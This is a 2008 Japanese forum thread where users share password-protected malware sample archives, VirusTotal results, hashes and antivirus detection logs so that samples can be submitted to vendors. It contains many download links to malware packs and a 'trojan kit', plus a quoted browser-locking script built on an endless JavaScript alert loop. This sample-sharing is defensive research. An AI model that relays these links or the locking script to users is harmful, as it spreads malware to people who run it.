(-_-)??
http://www.virustotal.com/jp/analisis/4c370d9b9f9342d0180741f83fcecc09

>>569ファイル名 v53.js 受理 2008.10.13 05:14:24 (CET)結果: 1/36 (2.78%)
>>575File v53.js received on 10.13.2008 10:48:49 (CET)Result: 0/36 (0.00%)
>>576ファイル名 v53.js 受理 2008.10.13 11:29:38 (CET)結果: 3/36 (8.33%)

こちらの環境では
>>569のtane0091\v53.jsは
MD5:
900568607C8F8DC5D69D755607298D2E
SHA1:
05AC8A7E45B84C7E16CECBE2BA3BC942FD21D594

toyota.jpの先の>>572のv53.jsは
MD5:
A8CC021CD9225E87EC98DF2FD09609DA
SHA1:
C5DFB91B9A1FC6BFA5BA9520B03F707D2CA96E98
で>>569と>>576のVTと同じだたぁー

DL中に壊れたのかな？

http://www1.axfc.net/uploader/He/so/146883.zip&key=news

>>578
>>3

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=92
Malware-Pack47

例によってMcAfeeには提出済み

>>580
�d

カスペ2009@21:26:00

6/12(03,.4,7,9,a)

Detected Trojan program Trojan-Downloader.Win32.Zlob.aagk　　　　0/setup.exe
Detected virus not-a-virus:FraudTool.Win32.SmartAntivirus2009.d　3/sa2009.exe
Detected Trojan program Trojan.Win32.Humor.ic　　　　 　　　　　　4/play-video.exe
Detected Trojan program Heur.Trojan.Generic　　　　　　　　 　　　7/bk.exe
Detected Trojan program Trojan-Downloader.Win32.FraudLoad.vcnp 9/zcodec.1113.exe
Detected virus not-a-virus:FraudTool.Win32.Agent.cx　　　　　 　　a/pcprotectioncenter_setup.exe

検体提出します。

>>580

0 http://www.virustotal.com/analisis/27885a454ac4be8a602ac4b028504b17
1 http://www.virustotal.com/analisis/83c6837aa758bede279ef924628c8103
2ファイルなし？
3 http://www.virustotal.com/analisis/d65acfac0326135982f3d6bbdf1223d9
4 http://www.virustotal.com/analisis/d65acfac0326135982f3d6bbdf1223d9
5 http://www.virustotal.com/analisis/d65acfac0326135982f3d6bbdf1223d9
6 http://www.virustotal.com/analisis/ec838a0b7da7b1a80908eccc6968fdd3
7 http://www.virustotal.com/analisis/e2bbb06d2fe4f1c11636019256b72dde
8 http://www.virustotal.com/analisis/e130af4b36c234c1b50b24b281e9776f
9 http://www.virustotal.com/analisis/99632bc2bcce28a681f9aa74333b3f39
a http://www.virustotal.com/analisis/98f64d1bdd4b532a03052aafe5767336
b http://www.virustotal.com/analisis/00bf016ccf1f41128d5bf60ace997091

>>580
書庫に難アリ
0、1しか解凍出来ないよー
再up希望

こっちの手元では正常に解凍できるんだが…
2はファイルはいってないねｗ

Archive: tane0092.zip
Length Date Time Name
-------- ---- ---- ----
12800 08/10/11 14:59 Malware/0/setup.exe
17782 08/10/06 14:00 Malware/1/search.jpg
0 08/10/08 08:47 Malware/2/
1431040 08/10/07 19:29 Malware/3/sa2009.exe
22020 08/10/07 19:33 Malware/4/play-video.exe
1881040 08/10/08 10:07 Malware/5/virdest.exe

ないね

ステルスマルウェア

違うスレにコピペすると(ry

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=93
Pass：virus

Avast!＆DrWebに提出済み

>>588
http://www.virustotal.com/analisis/3d01aa38ffe6b95d09d0ac330055ad1a

avast!は検出するんですけど・・・・

Win32:Trojan-gen {Other}

と思ったらVirustotalのavast!のパターンファイルが古いみたいだな

VPSバージョン：081016-0, 2008/10/16

>>588
McAfeeに提出させて頂ました。

>>398

カスペからの亀返事
1ヶ月かかったorz

0\setup.exe

Hello.

File contains not-a-virus:FraudTool.Win32.SpywareStop.hb

ウイルスウォッチを見ると、19:17検知。シグネチャ未作成。

http://www.virustotal.com/analisis/621f8936ec9b01ab90ade661f270a376


>>414のVerisignの署名付きの砂箱超えたやつか？
鯖から消えているからわからない。

カスペも処理能力が追いつかなくなってきたのかな？

【緊急!】ウイルス即行駆除方法【助けて!】Part3
http://pc11.2ch.net/test/read.cgi/sec/1214830385/599,606,635,640

ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=94
DLKey:634

>>594
一応、カスペに検体提出した。

>>595
一応かyoﾌﾟﾝｽｶ

>>594
念の為、McAfeeに検体提出した。

>>594
砂箱で実行してみたけど、マルウェアじゃなかったよ。
XPで実行したら・・・

ご使用中のオペレーションシステムはFSTIEmcf.exeではサポートされてません。
動作環境については、FSTIEmcf.txtをご確認ください。

って出てきた。（笑

カスペからの返事
>>594

Hello.

No malicious software was found in the attached file.

-----------------
Regards, Evgeny Aseev
Virus Analyst, Kaspersky Lab.

>>594
http://www.virustotal.com/analisis/e4c6a3b503e2e37a9ed2b7d175bce478

>>598を見るとSRI上位のベンダー（AntiVir、avast!、AVG、BitDefender）とカスペの違いがわかるな
ウイルス対応速度のみでPacker捕獲やGeneric検出というのを除いて一番性能良いのはカスペなのかも

SRIで一時期バスターがトップになってたのは
バスターがPackerを有害判定するようになって
SRIがそれをスルー扱いしなかったからだね。

http://www.virustotal.com/analisis/9e0da2bb65c10ed16a7045fadf3a3a41

Avast 4.8.1248.0 2008.10.15 VBS:LoveLetter-C

Virustotalのavast!の時間が止まってる件について

最新は↓こっち

現在の更新の情報
合計時間： 16 s

- Vps： 既に最新です
(現在のバージョン 081018-0)

サーバー： download976.avast.com (74.54.138.162)
ダウンロード ファイル： 2 (0.02 KB)
ダウンロード時間： 2 s

>>600
でも現時点でもバスターはPackerを蹴るよね？

うん、SRIがそれをノーカウントにし始めた。

結果がNODとの最下位争いか
まぁ妥当なとこだな

バスターは一時期1717というスルー検体を出したけどそこから300以上スルー検体を減らしたのは評価できるんじゃない？しかもたった1ヶ月半という短期間で

SRIの動向見てるとノートンも地味に良くなってるよね、これはノートンの対応速度が早くなってるということなんだろうね
SRI上位はともかく中位に位置するCATやVirusbusterは落ちた方がいいな、これらが中位にいると誤検出ランキングと思われても仕方ない

>>605
実際、その側面もあるよ。
SRI(笑)は、VTで、CATなど一つでも検出したらマルウェア扱いでしょ。

だからノートンやマカフィーの対応速度が早くなってCATやVirusbusterには落ちてもらわないと
ノートンはともかくマカフィーはSRIで最近やや停滞気味なのが気になるけど
ノートンは今の調子ならSRIでは最終的にカスペよりちょっと下という程度まで追いつくんじゃないかと見てる

SRIの動向見てると何気にPandaも良くなってるよな、まあPandaも実力あるベンダーだから頑張ってもらわないと

それ以前にマルウェアかどうか調べずに検体に使用しているSRIはどうかと思う。
確か、どれか1つのベンダーでもマルウェアと判定すればそれはマルウェアになっちゃうんだよね？（違

あと、カスペは7のエンジン（VTが7）だから2009だともうちょい良いかも。

SRIのサンプルは、CyberTAの方で確認したマルウェアを利用しているのであって
VTでマルウェア判定しているのではないよ……

>>609
これか・・・
http://www.cyber-ta.org/Honeynet/

ってことはSRIで使ってる検体はちゃんとしたマルウェアってことでおk？

DISCLAIMER: These detection rates represent the TRUE POSITIVE detection rates of these various antivirus tools on the limited corpus of malware binaries captures by our honeynet.
The results do not take into consideration the false positive rate of a given tool, and thus a tool that declares everything to be infected
would appear to have the highest true positive percentage rate. All antivirus results provided via www.virustotal.com.

注意書き
この結果は、誤検出のレートを全く考慮に入れていません。
従って、あらゆるものに対して陽性反応を出すAVは、最も高い検出率を示すことになります。

結論 無意味

Wilders Security Forumsでも、スルーされてる。論ずるに値しないとしてスルーされてる。
http://www.wilderssecurity.com/showthread.php?t=222657

>>609 ツールで機械的に収集されているマルウェア。壊れているものもある。

Second: Lately there has been a large proliferation of tests based on VirusTotal. I won't comment on those automatic tests but instead I would focus on a question:
where is written how tested samples are really choosed? How samples are really tested if they are really malware and if they are really dangerous and not in any way corrupted files?

On that webpage there's only written "on the limited corpus of malware binaries captures by our honeynet" . It's not really the best way, for a lot of reasons.

Just an example: some antiviruses detect corrupted files as corrupted, some other detect corrupted files as malware (presence of the signature)
even if they are clearly corrupted and they can't be executed at all, some other don't detect corrupted files.

So do antiviruses that don't detect corrupted files score worse than other antiviruses? Why?

>>611-612
NODの大本営と名高いWilders Security Forumsからの引用かよ
しかもPrevx社員による発言とは恐れ入った（笑

参考
27th 62% 1362 NOD32v2
30th 25% 2695 Prevx1

>>613
> >>611-612
> NODの大本営と名高いWilders Security Forumsからの引用かよ

それじゃ、SpywareBlaster, Look'n'Stop, Acronis, ewido (AVG anti-spyware) なんかも
Wilders Security Forumsを公式サポートフォーラムにしてるから信頼できないな
2ch仕様としては全部入れてはいけないソフトだな

誰も信頼の有無なんか論じてないんだがw
数多くある意見の1つってだけの話
なに必死ぶっこいてんの？

>>615
一番スレでやれ

>>616
悔しかったの？w
>>611前後の連中に言えよ

>>594
カスペからの返事をまとめると、8/11

Hello,

bk.exe_ - Trojan.Win32.Autoit.eu,
InternetGameBox_setup.exe - Trojan.Win32.Obfuscated.vir,
setup_110144_3.exe_ - Trojan-Downloader.Win32.FraudLoad.vctr

These files are already detected. Please update your antivirus bases.

search.jpg_, YMStatus.exe_　,virdest.exe_

No malicious code were found in these files.

Please quote all when answering.

レス番が580あたりの間違いだろうと思うが乙

ttp://www.youturebe.com/watch/bRgdOsgPxVg.zip

>>620
http://www.virustotal.com/analisis/baff91040285bdf574f7cebe3278308e

>>620
シマンテックに送りました

ほぼ全社検出だが、ネタとしてリンクのリンクだけ
http://pc11.2ch.net/test/read.cgi/sec/1140517079/

ごめん http://pc11.2ch.net/test/read.cgi/sec/1140517079/967-

>>620
Symantec対応
NODも亜種で検出

http://www.virustotal.com/analisis/215977d033b7045da2d5fa1052d828fe

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=95
Malware-Pack48

例によってMcAfeeには提出済み

>>626
�d
カスペ2009 20:38:00

7/12 (2,3,5,6,7,9,b)

Detected adware not-a-virus:AdWare.Win32.Cinmus.vpb　　　　　 　　/2/PrivateContent.exe
Detected adware not-a-virus:AdWare.Win32.Agent.gbm　　　　　　 　　 /3/49.exe//data0003
Detected Trojan program Trojan-PSW.Win32.QQPass.dwt　　　　　　　　/5/album.com//UPX
Detected Trojan program Trojan-Downloader.Win32.Small.afnj　　 　　/6/Plug-in.exe
Detected Trojan program Trojan-Downloader.Win32.CodecPack.dc 　　/7/xcodec.86.exe
Detected riskware not-a-virus:RemoteAdmin.Win32.WinVNC-based.c　　/9/UBS-Support.com.exe
Detected Trojan program Trojan.Win32.FraudPack.gld　　　　　　　　　　　/b/setup_1_1_.exe


検体提出します。

>>626乙
NIS2009で 2/12 （3、b）
未検出は贈っておきます

>>626
カスペからの返事

0 : setup.exe_ - Trojan-Downloader.Win32.FraudLoad.vcxo
1 : setup.exe_ - not-a-virus:FraudTool.Win32.ErrorKiller
4 : A9installer_880020.exe_ - not-a-virus:FraudTool.Win32.Antivirus2009.ak
8 : ex002.exe_ - Trojan.Win32.Agent.ajlg

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

a : SetupCasino.exe_

No malicious code was found in this file.

結局、7+追加4=11/12 (a以外全て）

>>626
Rising Internet Security 2009 21.15.21 (21.00.30.00) Last Update Time=2008-10-23 18:43
a\SetupCasino.exe>>pecompact2x: Adware.Win32.Agent.kje

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=96
Pass:virus

カスペには提出済み

>>631
http://www.virustotal.com/analisis/d42982ad1ae8a5493918333a630f9f8a
カスペは既に検出してる
それよりAntiVir・・・・
ま、AntiVirと今のSymantecなら爆速対応だから問題ないということでこれらの検体提出はよろしく
とりあえずPandaに提出しておいた

>>631
McAfeeに提出させて頂ました。

Pandaは対応した模様
http://www.virscan.org/report/c455326d9b96a1739443f77f416e4d11.html

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=97
Pass:virus

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=98
Pass:virus

>>635
http://www.virustotal.com/analisis/63ccdd64e6f577679dd2bb10b6599ad7
>>636
http://www.virustotal.com/analisis/1e67fa43b4d367b4d5822096a4e930ad

635はavast!のチェストからavast!に提出

>>636
McAfeeに提出させて頂ました。

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=99
Pass:virus

http://www.virustotal.com/jp/analisis/9bc54e9f220140c6b35816d5f76449bd
カスペに提出、対応済み

>>639
McAfeeに提出させて頂ました。

>>635
カスペに送りました。

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=100
Pass:virus

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=101
Pass:virus

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=102
Pass:virus

>>642
http://www.virustotal.com/analisis/916004ab85047193ae9731dff77d4e2e
>>643
http://www.virustotal.com/analisis/44b006e8eefe96df8a405d85a208ec8d
>>644
http://www.virustotal.com/analisis/cdc1c843290911b71b9cc2f1df61bbd0

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=103
Pass:virus

>>646
http://www.virustotal.com/analisis/855865c7f809a83e462d61d848ea0820

鑑定スレかよ

>>643
>>644
McAfeeに提出させて頂ました。

>>640
McAfeeからの自動受信確認メールなし

>>642-644, 646
カスペ2009
スルーにつき、検体提出します。

ここまでシマンテックに贈りました

>>642-644

カスペからの返事

No malicious code was found in this file.

>>646は待ち。

>>646も白とのこと。

>>635
No malicious code was found in this file.と回答がきました

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=105
Pass:virus

中身はZlob
antivirus.v.1.exeを実行すると、tempフォルダに無数のファイルを作成する。

ベンダーへの送信、お願いします。

スマン。sageるの忘れた。（汗

>>655
�d

カスペ2009@ 23:46:00
2/4

Detected Trojan program Trojan-Spy.Win32.Zbot.fza zlob\034b4q5A.exe
Detected Trojan program Trojan.Win32.Agent.alml zlob\~tmpd.exe

検体提出します。

>>655
McAfeeに提出させて頂ました。

>>655

http://www.virustotal.com/analisis/9051a064a60001439da0c0cc1fb7825e
http://www.virustotal.com/analisis/f0d75d58ecb34b2261bf6bfbcbff06b7
http://www.virustotal.com/analisis/7c79b98238e97d5c1c49d1490a885b37
http://www.virustotal.com/analisis/7c79b98238e97d5c1c49d1490a885b37

バスター2009ではPAK_Generic.001が検出しないけどこれってトレンドマイクロ恒例の不具合？

それただのPackerだから設定次第なんじゃね?

>>655
カスペ2009
返事は来ないが、ダウンローダーとして追加検知。 2+追加2=4/4

Quarantined Trojan program Trojan-Downloader.Win32.Agent.anln antivirus.v.1.exe
Quarantined Trojan program Trojan-Downloader.Win32.Agent.anlx 6.exe

avast!は今回のアップデートで大方検出するけど何故かVirustotalでは反応せず・・・

tmpd.exe
Win32:Trojan-gen {Other}

6.exe
Win32:Trojan-gen {Other}

034b4q5A.exe
Win32:Spyware-gen [Trj]

http://www.virustotal.com/analisis/637e7afc98e49179fe5f69bc826f5b1c
http://www.virustotal.com/analisis/dd53f7b8a8b3302b1bbc1be83a32c402
http://www.virustotal.com/analisis/8141b66b6b45cce7faec076fa7f765c1
http://www.virustotal.com/analisis/dcd2944c7c58f5d84e520d173006c3b9

それにしても今年になってからavast!の成長が目覚しいな

SymantecってPacker検出するようになったの？

http://www.virscan.org/report/193fca501f2be64967bc18d49eb4af1b.html

http://infosueek.com/arad/movie20856.zip

>>664
ttp://www.virustotal.com/jp/analisis/830c55e01e288d6aacb6f4d0aafc5d6f

>>655

11月3日時点の検出状況

http://www.virustotal.com/analisis/db58fedba92026b0a8259373d10049dc
http://www.virustotal.com/analisis/c9507aef924bde84153c5cf715a1f3bc
http://www.virustotal.com/analisis/808d2b5b3f0e4d29c6b5221ca5957343
http://www.virustotal.com/analisis/3448e00747b31ee1530fa40183dbe9eb

パーフェクト：AntiVir、AVG、Kaspersky
3個検出：avast!、バスター、GDATA
2個検出：McAfee
1個検出：Symantec、NOD32、Norman
オールスルー：BitDefender、Panda、K7

BitDefenderとPanda頑張れよ
それにしてもPandaはヒューリスティックが強力だしTruPreventテクノロジーだってあるししかも検体送れば2〜3日で対応してくれるのになんでSRIでは下位に沈むんだろ？
それが不思議で仕方ない、これだけ対応良かったら新種にもかなり強いはずなのに・・・

あと今回のVirustotalはF-Secureがなかった

>>655
Symantecに送っておきました

>>666
bitdefenderは、あさってあたりで対応すると思うよ。ちょっと遅いんだ

>>660
ｽﾏｿバスター2009でリアルタイム検索範囲を最大にしても検出しなかった
というわけで誰かバスター2009でPacker捕獲できるように設定できるのを知ってる方がいたら教えてください

それはバスタースレで聞いたほうがいいんじゃ

右クリックしてのコンテキストメニューからVirus Totalに送れなくなってるぜ……

>>669
コーポレートエディションならできるんじゃない？

>>655
11/5時点の検出状況

http://www.virustotal.com/analisis/bd9f619a9aa00da1d50dd2bd08c5fa15
http://www.virustotal.com/analisis/40c17ae263e801df468a39c278a9c97b
http://www.virustotal.com/analisis/a1834ea94d93facfaf6b31008aba4095
http://www.virustotal.com/analisis/ce72a25d1338f584d5323ffa3e70b310

全検出：AntiVir、AVG、avast!、BitDefender、Kaspersky、NOD32、Panda、F-Secure
3個検出：Symantec、バスター、McAfee、Microsoft、Noroman、Sophos、アンラボ
2個検出：K7（ZERO）
1個検出：Rising（キラー）

まとめは雑だけどこんな感じ、それにしてもNODが全検出って・・・・しかも3日で対応とか・・・・
他のベンダーも大体2〜3日で対応できてるね、あと主要ベンダーと弱小ベンダーの差はここでも出てるな、Virusbusterとかほとんど検出できてないし

VirusBusterとか誰も送らんだろｗ

>>655
Risingに送ってきました

>>673
good job

ところで、VirusTotalから各ベンダーには、検体情報は流れるの？
ベンダーからシグネチャとエンジンもらっているだけという人もいれば、その見返りにベンダーにVTの情報を提供しているという人もいる。


教えてエロイ人

ベンダー次第じゃねーの?
10件以上判定出たらくれとか全くいらねとか。

半自動で送り付けてるんだろうとは思います
少なくともいえることは、ベンダに通報しないことができなくなったということ

http://im3a.atura.jp/bbs5/31207/img/0005871719.zip
news

>>680
>>3

きりがないので、こういうのは他所で鑑定済みのものに限る

>>680
ttp://www.virustotal.com/jp/analisis/a953eea976b81d3eb1944f202be19ea8
結果: 36/36 (100.00%) ﾜﾛﾀ

とりあえずトレンドマイクロにウイルスバスター2009でPAK_Genericを検出できない件について問い合わせしてみた
単なる不具合ならアップデートで改善して欲しいところ

スレチ失礼しました

バスターのリアルタイム検索は、パッカーの面倒までみないだけじゃないの？
VTの結果を確認するのに、何故リアルタイム検索なのかよく分からんけど…

いや、手動検索でもまったく無反応なんだよね＞PAK_Generic

とりあえず問い合わせ結果次第でこのスレに貼るつもりです

ttp://www.websafenotice.com/v6/05-12flo9/v1/

ここ結構更新してる方？

>>686
http://pc11.2ch.net/test/read.cgi/sec/1224605615/438-440
↑ですね

virlab_install.exeは見つかったので、McAfeeに提出させて頂ました。
ttp://www.virustotal.com/jp/analisis/2528d541bc8caa9760534ff6ebe69a3d

http://tnpt.net/uploader/src/up24741.exe

>>688
ttp://so.7walker.net/index.php?site=http%3A%2F%2Ftnpt.net%2Fuploader%2Fsrc%2Fup24741.exe&hua=
ttp://www.virustotal.com/jp/analisis/09641a2d3fb67e5840dcd664a93baefa

>>688
カスペ2009
スルーなので、検体提出します。

>>688
カスペからの返事。有害ファイルのようだが、検体名不明。

From: [email protected] [mailto:[email protected]]
Sent: Sunday, November 09, 2008 11:11 PM
Subject: RE: Quarantined object; A New Malware? Please Inspect the file. up24741.exe [KLAN-13338568]

New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

>>688
有害なbatファイルを生成しますね。
（スタートアップに自分自身をコピーし、1秒後に再起動）

>>689
本日のスキャン結果
ttp://www.virustotal.com/jp/analisis/c12e3da9faca2380e8b56cb32fa0d2f7
検出：AntiVir,F-Secure,Kaspersky,SecureWeb-Gateway

実質2つかｗ

>>692,693
無限再起動ループさせるのかこのウイルス ｶｸﾞﾌﾞﾙ

セーフモードで起動してスタートアップからse.bat消せばいいだけ
実はただの糞プログラムでしたｗ

Virustotalの9月以降の解析データ吹っ飛んでるね

http://www.geocities.jp/oresamamansee/saichuu.lzh

>>698
ファイル名 saichuu.lzh
ttp://www.virustotal.com/jp/analisis/5160346c53c5c51a4265f633792438b9
↓解凍
(個人撮影)(無修正)(2ch女神)(再厨紳士)[051016] 再厨系ZIPパス辞書　これでピカれ！随時更新！
ファイル名 __________________________2ch____
ttp://www.virustotal.com/jp/analisis/d7ce57988655f15aead6da014a764f3f
↓ZIP展開
(個人撮影)(無修正)(2ch女神)(再厨紳士)[051016] 再厨系ZIPパス辞書　これでピカれ！随時更新！
ファイル名 saichudic.txt
ttp://www.virustotal.com/jp/analisis/911420c79963b61b3fc0baa02ab4eab1

鑑定ｱﾘﾄｩｰｯｽｗｗ

【重要】
●ここは鑑定スレではありません。malwareのみお願いします。
割れ厨やネトゲチート厨がここで鑑定させようとすることがありますが、スルーしてください。

http://www.koha0kohaweb.com/data/mec/uporg1780053.zip

>>702
ttp://www.virustotal.com/analisis/d599d8e2f2221deb773272e99a1d73a5

http://www.hackpalace.com/virii/makers/trojan%20kit.zip

>>704
http://www.virustotal.com/jp/analisis/3644d503c8d646c48b407fc0d452ed25

ブログ民・ブログ店に仕込まれたネトゲトロイ(ブログ板参照)
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=111
virus

>>702
McAfeeに提出させて頂ました。

>>706
McAfeeに提出させて頂ました。

bho1.exe
http://www.virustotal.com/jp/analisis/a59034ece6d24269c2c5e16c32d956ba
dldr0.exe
http://www.virustotal.com/jp/analisis/765e28cc498dbf6f8c29d5c74d30b675
dldr1.exe
http://www.virustotal.com/jp/analisis/f7521c2096a4b49f516f4223221ba3af
lineage2.exe
http://www.virustotal.com/jp/analisis/2c97e6ac8c62f63ca00ad60d234233ba
pol_ffxi.exe
http://www.virustotal.com/jp/analisis/2ea7810229819eb5a7b9a98fbb5b911a

>>706
�d
カスペ2009 20：37:00

3/5

Detected adware not-a-virus:AdWare.Win32.BHO.dxq tane0111.zip/bho1.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.aoks tane0111.zip/dldr0.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.ajwx tane0111.zip/dldr1.exe

lineage2.exe,pol_ffxi.exeについて検体提出します。

85 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/11/14(金) 21:54:17
http://　　zakopero.hp.infoseek.co.jp/3.html　　←　注意　ウィルス

すみません　↑これ踏んじゃったんですけど　対処はどうしたらいいでしょうか
よろしくお願いします。

ここはそういうスレではありません。
質問スレとかあるだろ。

<HTML>
<BODY>

<SCRIPT>
for(;;) {
alert('ｼｫｶﾈｼｫﾆﾀ､ﾀ､ﾊ;(釈;ｧﾘ;釈;)');
}
</SCRIPT>

</BODY>
</HTML>


だって。FOR文でまわしてるだけだから、プロセス落とせばいいだけ。
アラートにあるとおり、自業自得だな。

>>706
返事は来ないが、検知したので対応した模様。 3＋追加2 = 5/5

Detected Trojan program Trojan.Win32.Delf.gah lineage2.exe
Detected Trojan program Trojan-PSW.Win32.Nilage.dma pol_ffxi.exe

>>706
Panda GlobalProtection2009
dldr1.exeはヒューリスティック検出
bho1.exeはスルー
それ以外はTruPreventで検出（Virustotalにも反応なし）

追記
PandaはヒューリスティックTruprevent問わず未知のウイルスを最初は検出するんだけどその後同じファイルをスキャンすると何故かスルー・・・
これ不具合なのかな？さすがにこんなのは困る

http://www.koha0kohaweb.com/data/mec/uporgf1780054.zip

>>717
Kaspersky
LINEAG~3.EXE Trojan-Dropper.Win32.Agent.zgw
LINEAG~1.EXE Trojan.Win32.Inject.jzc

>>717
Panda GlobalProtection2009
LINEAG_3.EXEはヒューリスティックで検出
LINEAG_1.EXEはスルー

ちなみに検出したあと同ファイルをスキャンするとスルーするという現象、どうやら検疫ファイルから復旧後勝手に除外ファイル設定される
通りで検出しないと思ったら・・・・

>>706
11/16時点の検出状況

http://www.virustotal.com/analisis/946a9f8a68ad3c036fe3840d746e539d
http://www.virustotal.com/analisis/4a8a8894ba7898fba0dc837d4bd9b919
http://www.virustotal.com/analisis/47ac5f58983243c08aab23083059306d
http://www.virustotal.com/analisis/d9df8dd47383a7dedb9cd83657fcae11
http://www.virustotal.com/analisis/a0d542b534cc75b882ae3ba0e8b18d3a

ところでPanda以外で「検出するけどVirustotalでは反応しないウイルスが多い」というベンダーってある？
Pandaはそういう点では面白いベンダーだな

>>717
NOD32
uporgf1780054.EXE　Win32/PSW.OnlineGames.ODD亜種

ファイル単体を手動解凍させてから検査したところ、
LINEG~1.EXE　スルー
LINEG~3.EXE　Win32/PSW.OnlineGames.ODD亜種

>>717
http://www.virustotal.com/jp/analisis/3d71ebff9e29b51e31795228b5d891e1
ノートンやバスター、マカフィーでは検出せず
AntiVir、avast、AVG、ClamAVでは検出
フリーの方が優秀だな

2匹を圧縮してあるからVTに投げる場合は解凍してくれ

ZIPで検出しないソフトなんだから解凍したって１匹も検出できないことはわかってる

圧縮した場合はこんな感じ

http://www.virustotal.com/analisis/d3f806e4ce2b8ae95638452431a11698
http://www.virustotal.com/analisis/895c370d5b456376a57740ef04b008a4
LINEAG_1.EXEはAVG、Symantec、バスターが検出してLINEAG_3.EXEはAVGとバスターがスルー、それ以外の主要ベンダーが検出という感じ
両方検出してるのはSymantecとKasperskyとMicrosoft

訂正

×　圧縮した場合はこんな感じ
○　解凍した場合はこんな感じ

ちなみに華麗に両方スルーはウイルスセキュリティZERO(爆笑）ですな

ってことは、>>722で検出できないけど>>725で検出するソフトは
ZIPの展開もまともにできないソフトか
それもまた問題だな

>>728
その理屈だとノートン、バスターよりNOD29の方が優秀ってことになるんですがｗ
・・・・んなわけねーだろ

PnadaGlobalProtection2009で>>722はTruPreventで検出

Pandaと書こうとしたのにPnadaって・・・

>>729
君、頭は大丈夫？
もう少しきちんと読んでから発言したほうが良いよw

いや別にｗ
一箇所突っ込みどころ（NOD29）があったからそこを突っ込んでみただけ

>>733
あれ？
答えになってないよw
ひょっとして翻訳ソフトを使って日本語を中国語やハングルに訳してるから
どこがおかしいのか分からないとかかな？

↑そんなにNODを否定されるのが嫌かｗｗ

＞答えになってないよw

だからこういうことでしょ

728 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/11/16(日) 17:46:47
ってことは、>>722で検出できないけど>>725で検出するソフトは
ZIPの展開もまともにできないソフトか
それもまた問題だな

>>735
NODなんか使ったことないから否定でも肯定でも構わないよ
問題は>>728から>>729を結論として導き出したところにある
>>728の内容を理解していれば>>729のような結論は出ない

君は無理やりNODを否定したがっている人物か、
日本語を理解する能力に乏しい人物ではないのかね？

VT等はログの1行(最初か最後かは知らん)しか拾わないんだから
複数ファイルが入った書庫はバラさないとだめなんすよ。

>>737
かなり妄想癖があるようだね
どこにそんな規定があるのかな？
http://www.virustotal.com/jp/sobre.html

>>736
だから728をコピペしてるということは728は全面同意してるんだが

＞問題は>>728から>>729を結論として導き出したところにある
＞>>728の内容を理解していれば>>729のような結論は出ない
＞君は無理やりNODを否定したがっている人物か、

要は「話しが噛み合ってない」ってことでしょ、これはこちらがｽﾏｿ

で、NODは本当に酷いソフトなんだよね

ノートンとバスターは圧縮ファイル検出に関しては以前から指摘されてたような気がする
バスターは一応圧縮ファイルスキャンできるけど6階層までなんだよね（今回のファイルは2階層だからそういうことでもないだろうけど）

>>739
> だから728をコピペしてるということは728は全面同意してるんだが

スゲー負け惜しみにしか見えないw

>>741
まだやってたのかよｗｗｗ

そもそも最初からカスペやフリーソフトに全く触れなかった時点で728の主張を認めてたってこと
で、ノートンやバスターにそういう問題があったとしてもそれでNODより劣るのか？ということなんだが

ま、ノートンやバスターの圧縮ファイル検出問題とNODの低検出の問題は関係ないから確かに俺の言ったことは頓珍漢だった、それは認める

>・淡々とやれ淡々と！
>　淡々と貼り、淡々といきましょう。
>・あらしはスルー。ソフトの優劣の議論は別スレで！
淡々といこう

＞>・あらしはスルー。ソフトの優劣の議論は別スレで！

そのソフトの優劣として議論するはずの「一番いいセキュソフトはどれか？」のスレなんだけどカスペ叩きコピペ（しかも捏造）の連投ばかりでスレが機能してないんですが・・・・

ttp://www1.axfc.net/uploader/He/so/159518.zip
パスはzipです。

>>745
http://www.virustotal.com/analisis/43c93c9b084c829174eeceb1089b17c9

ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=112

DLPASS:virus

>>747
�d
カスペ2009

スルー
検体提出しました。